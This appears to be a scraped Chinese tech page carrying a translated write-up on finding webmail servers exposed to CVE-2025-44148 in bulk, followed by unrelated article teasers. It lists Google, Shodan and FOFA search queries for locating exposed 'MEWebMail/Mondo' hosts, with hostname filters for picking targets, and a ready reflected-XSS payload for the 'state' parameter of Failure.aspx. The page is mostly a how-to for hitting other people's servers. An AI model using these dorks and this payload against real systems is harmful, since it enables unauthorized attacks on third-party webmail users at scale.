news 2026/4/28 2:57:28

XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

XSS大规模挖掘:CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者:Abhirup Konwar
2025年8月24日

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

(按回车或点击查看完整尺寸图片)

2️⃣ Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析:

  • Domain
  • ssl.cert.subject.cn

(按回车或点击查看完整尺寸图片)

3️⃣ FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

(按回车或点击查看完整尺寸图片)
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/21 6:36:17

临终关怀服务创新:用lora-scripts帮助患者留存最后的艺术记忆

临终关怀服务创新:用lora-scripts帮助患者留存最后的艺术记忆 在一家安宁疗护中心的病房里,一位年过七旬的老画家正安静地翻看自己年轻时的作品集。他的手已不再稳定,无法再执笔作画。但医护人员告诉他:“我们可以把您的风格留下…

作者头像 李华
网站建设 2026/4/28 15:20:21

【Java毕设源码分享】基于springboot+vue的延安美食乐享系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/4/28 15:19:40

lora-scripts与HuggingFace镜像加速结合使用最佳实践

LoRA 训练提速实战:如何用 lora-scripts 与 HuggingFace 镜像打造高效微调流水线 在当前 AIGC 爆发式发展的背景下,越来越多开发者希望快速定制属于自己的生成模型——无论是训练一个专属画风的 Stable Diffusion 模型,还是为客服场景微调一段…

作者头像 李华
网站建设 2026/4/27 2:16:22

电视剧服装复刻:历史剧造型师用lora-scripts还原古代服饰细节

电视剧服装复刻:当历史剧造型师遇上LoRA脚本 在某部即将开播的汉代题材剧中,一组人物定妆图悄然走红——宽袖深衣、云纹刺绣、组绶佩玉,每一处细节都仿佛从马王堆帛画中走出。然而鲜有人知,这些高度还原的服饰设计,并非…

作者头像 李华
网站建设 2026/4/20 12:09:51

核电站安全培训:虚拟事故场景图像生成强化员工应急反应

核电站安全培训:虚拟事故场景图像生成强化员工应急反应 在核电站这类高风险工业环境中,一次微小的判断失误可能引发连锁反应。操作人员能否在高压、高噪声的真实事故中迅速识别异常信号并采取正确措施,直接关系到公共安全与设施稳定。传统的培…

作者头像 李华